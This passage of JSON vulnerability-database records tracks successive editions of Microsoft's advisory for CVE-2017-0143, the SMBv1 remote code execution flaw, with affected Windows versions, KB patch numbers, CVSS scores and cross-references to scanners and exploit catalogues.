"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T11:28:55", "differentElements": ["msAffectedSoftware"], "edition": 47}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-16T12:44:29", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012606", "KB4012214", "KB3213986", "KB3212646", "KB4012212", "KB4012213", "KB3210720", "KB4013198", "KB3205401", "KB4013429", "KB3177186", "KB4012217", "KB3210721", "KB4012215", "KB4012598", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-16T12:44:29", "differentElements": ["msAffectedSoftware"], "edition": 48}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-17T02:51:36", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3210721", "KB3177186", "KB3205401", "KB4012215", "KB3210720", "KB4012216", "KB4013198", "KB4012214", "KB4013429", "KB3205409", "KB3212646", "KB4012212", "KB4012606", "KB3213986", "KBMS16-110, 3187754", "KB4012598", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T02:51:36", "differentElements": ["msAffectedSoftware"], "edition": 49}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", 